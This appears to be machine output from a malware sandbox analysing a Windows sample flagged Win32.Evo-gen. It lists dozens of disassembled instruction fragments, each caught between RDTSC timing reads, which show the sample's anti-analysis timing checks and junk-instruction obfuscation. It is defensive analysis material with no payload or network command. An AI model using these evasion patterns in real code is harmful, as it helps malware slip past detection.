Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51B03A1 second address: 51B03A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51B03A5 second address: 51B03AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51B03AB second address: 51B03D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC734882087h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51B03D7 second address: 51B03DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51B03DD second address: 51B03E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51B03E1 second address: 51B040B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax], 00000000h 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC734E5F77Dh 0x00000012 jmp 00007FC734E5F77Bh 0x00000017 popfd 0x00000018 push eax 0x00000019 push edx 0x0000001a mov bh, cl 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51A0E54 second address: 51A0EC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 mov edi, 47407D96h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FC734882088h 0x00000016 sbb eax, 498865B8h 0x0000001c jmp 00007FC73488207Bh 0x00000021 popfd 0x00000022 mov esi, 0CA389EFh 0x00000027 popad 0x00000028 mov dword ptr [esp], ebp 0x0000002b jmp 00007FC734882082h 0x00000030 mov ebp, esp 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FC734882087h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51A0EC5 second address: 51A0EF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FC734E5F785h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC734E5F77Dh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51B00BD second address: 51B0171 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC73488207Fh 0x00000009 xor eax, 186A6ABEh 0x0000000f jmp 00007FC734882089h 0x00000014 popfd 0x00000015 mov ax, 1807h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FC734882088h 0x00000024 sub si, 52E8h 0x00000029 jmp 00007FC73488207Bh 0x0000002e popfd 0x0000002f pushad 0x00000030 mov cl, 91h 0x00000032 mov ecx, edx 0x00000034 popad 0x00000035 popad 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007FC734882089h 0x00000040 sub ecx, 4FD6A7B6h 0x00000046 jmp 00007FC734882081h 0x0000004b popfd 0x0000004c jmp 00007FC734882080h 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51B0171 second address: 51B0195 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F77Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC734E5F780h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51B0195 second address: 51B01A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51B01A4 second address: 51B01F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F789h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FC734E5F783h 0x00000014 and al, 0000005Eh 0x00000017 jmp 00007FC734E5F789h 0x0000001c popfd 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51B01F8 second address: 51B020F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734882083h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D0611 second address: 51D0617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D0617 second address: 51D061B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D061B second address: 51D061F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D061F second address: 51D063A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC73488207Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D063A second address: 51D0649 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F77Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D0649 second address: 51D0700 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC73488207Fh 0x00000009 xor ecx, 3B64683Eh 0x0000000f jmp 00007FC734882089h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FC734882080h 0x0000001b jmp 00007FC734882085h 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 mov dword ptr [esp], ebp 0x00000027 jmp 00007FC73488207Eh 0x0000002c mov ebp, esp 0x0000002e pushad 0x0000002f mov cl, B6h 0x00000031 pushfd 0x00000032 jmp 00007FC734882083h 0x00000037 add ax, 585Eh 0x0000003c jmp 00007FC734882089h 0x00000041 popfd 0x00000042 popad 0x00000043 xchg eax, ecx 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007FC73488207Dh 0x0000004b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D0829 second address: 51D082F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D082F second address: 51D0833 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D0833 second address: 51D08A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c mov esi, eax 0x0000000e lea eax, dword ptr [ebp-08h] 0x00000011 xor esi, dword ptr [00BE4014h] 0x00000017 push eax 0x00000018 push eax 0x00000019 push eax 0x0000001a lea eax, dword ptr [ebp-10h] 0x0000001d push eax 0x0000001e call 00007FC73948E864h 0x00000023 push FFFFFFFEh 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FC734E5F789h 0x0000002c adc esi, 63E4B2F6h 0x00000032 jmp 00007FC734E5F781h 0x00000037 popfd 0x00000038 mov dl, al 0x0000003a popad 0x0000003b pop eax 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f mov si, 3BFBh 0x00000043 pushfd 0x00000044 jmp 00007FC734E5F780h 0x00000049 sub ax, D348h 0x0000004e jmp 00007FC734E5F77Bh 0x00000053 popfd 0x00000054 popad 0x00000055 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D08A1 second address: 51D08A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D08A7 second address: 51D08EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ret 0x00000009 nop 0x0000000a push eax 0x0000000b call 00007FC73948E8CFh 0x00000010 mov edi, edi 0x00000012 pushad 0x00000013 call 00007FC734E5F77Dh 0x00000018 pushfd 0x00000019 jmp 00007FC734E5F780h 0x0000001e jmp 00007FC734E5F785h 0x00000023 popfd 0x00000024 pop esi 0x00000025 push eax 0x00000026 push edx 0x00000027 push ebx 0x00000028 pop eax 0x00000029 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D08EC second address: 51D08FA instructions: 0x00000000 rdtsc 0x00000002 mov cl, bh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b mov bx, ax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D08FA second address: 51D090C instructions: 0x00000000 rdtsc 0x00000002 mov eax, 33129F49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, esi 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e mov bh, 85h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D090C second address: 51D0937 instructions: 0x00000000 rdtsc 0x00000002 mov esi, edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC73488207Ah 0x00000011 sub eax, 490CFCC8h 0x00000017 jmp 00007FC73488207Bh 0x0000001c popfd 0x0000001d mov ebx, esi 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D0937 second address: 51D095B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 mov di, 44C2h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC734E5F784h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D095B second address: 51D0973 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 mov edi, 476CC470h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov esi, 2BF98D07h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5180052 second address: 5180058 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5180058 second address: 5180073 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov cx, B173h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5180073 second address: 51800E6 instructions: 0x00000000 rdtsc 0x00000002 call 00007FC734E5F788h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC734E5F77Bh 0x0000000f popad 0x00000010 and esp, FFFFFFF8h 0x00000013 jmp 00007FC734E5F786h 0x00000018 xchg eax, ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c movsx ebx, si 0x0000001f pushfd 0x00000020 jmp 00007FC734E5F786h 0x00000025 sub esi, 6A769D38h 0x0000002b jmp 00007FC734E5F77Bh 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51800E6 second address: 5180114 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FC73488207Ah 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5180114 second address: 5180139 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F781h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC734E5F77Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5180139 second address: 51801A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC734882087h 0x00000008 pushfd 0x00000009 jmp 00007FC734882088h 0x0000000e sub ecx, 666CA6B8h 0x00000014 jmp 00007FC73488207Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebx 0x0000001e jmp 00007FC734882086h 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FC73488207Eh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51801A9 second address: 51801AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51801AF second address: 51801B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51801B3 second address: 51801C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51801C2 second address: 51801C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51801C6 second address: 51801CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51801CC second address: 5180267 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+10h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC73488207Ch 0x00000013 sub ah, FFFFFFD8h 0x00000016 jmp 00007FC73488207Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FC734882088h 0x00000022 and ax, B038h 0x00000027 jmp 00007FC73488207Bh 0x0000002c popfd 0x0000002d popad 0x0000002e xchg eax, esi 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007FC734882084h 0x00000036 add esi, 3685AA98h 0x0000003c jmp 00007FC73488207Bh 0x00000041 popfd 0x00000042 push esi 0x00000043 movsx edi, si 0x00000046 pop ecx 0x00000047 popad 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007FC73488207Dh 0x00000050 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5180267 second address: 51802D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F781h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b jmp 00007FC734E5F77Ch 0x00000010 call 00007FC734E5F782h 0x00000015 pushfd 0x00000016 jmp 00007FC734E5F782h 0x0000001b jmp 00007FC734E5F785h 0x00000020 popfd 0x00000021 pop ecx 0x00000022 popad 0x00000023 mov esi, dword ptr [ebp+08h] 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51802D0 second address: 51802D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51802D6 second address: 518030D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F77Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FC734E5F786h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC734E5F77Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 518030D second address: 5180356 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FC734882086h 0x0000000f test esi, esi 0x00000011 pushad 0x00000012 push esi 0x00000013 mov bl, 10h 0x00000015 pop eax 0x00000016 mov bx, ABAAh 0x0000001a popad 0x0000001b je 00007FC7A662034Ch 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 call 00007FC73488207Ah 0x00000029 pop eax 0x0000002a mov esi, ebx 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5180356 second address: 51803FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 pushad 0x00000011 mov cx, 042Dh 0x00000015 pushfd 0x00000016 jmp 00007FC734E5F77Ah 0x0000001b sbb eax, 16B83CC8h 0x00000021 jmp 00007FC734E5F77Bh 0x00000026 popfd 0x00000027 popad 0x00000028 je 00007FC7A6BFDA18h 0x0000002e jmp 00007FC734E5F786h 0x00000033 mov edx, dword ptr [esi+44h] 0x00000036 jmp 00007FC734E5F780h 0x0000003b or edx, dword ptr [ebp+0Ch] 0x0000003e jmp 00007FC734E5F780h 0x00000043 test edx, 61000000h 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c pushfd 0x0000004d jmp 00007FC734E5F77Dh 0x00000052 and ah, FFFFFFF6h 0x00000055 jmp 00007FC734E5F781h 0x0000005a popfd 0x0000005b pushad 0x0000005c popad 0x0000005d popad 0x0000005e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51803FA second address: 5180446 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882087h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FC7A66202E9h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FC734882084h 0x00000016 sub ecx, 665FF178h 0x0000001c jmp 00007FC73488207Bh 0x00000021 popfd 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5180446 second address: 5180493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC734E5F784h 0x00000009 popad 0x0000000a popad 0x0000000b test byte ptr [esi+48h], 00000001h 0x0000000f jmp 00007FC734E5F780h 0x00000014 jne 00007FC7A6BFD9A3h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FC734E5F787h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5180493 second address: 51804AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734882084h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51804AB second address: 51804AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51706FD second address: 5170711 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734882080h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170711 second address: 517072F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC734E5F783h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 517072F second address: 5170736 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170736 second address: 51707A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebp 0x0000000a jmp 00007FC734E5F787h 0x0000000f mov ebp, esp 0x00000011 jmp 00007FC734E5F786h 0x00000016 and esp, FFFFFFF8h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c movsx edx, cx 0x0000001f pushfd 0x00000020 jmp 00007FC734E5F786h 0x00000025 sub ax, AC88h 0x0000002a jmp 00007FC734E5F77Bh 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51707A1 second address: 51707C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51707C5 second address: 51707CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51707CB second address: 51707D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51707D1 second address: 51707D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51707D5 second address: 517080F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC734882084h 0x00000012 jmp 00007FC734882085h 0x00000017 popfd 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 517080F second address: 517081D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734E5F77Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 517081D second address: 517084C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007FC734882086h 0x00000011 xchg eax, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 517084C second address: 5170850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170850 second address: 517086D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
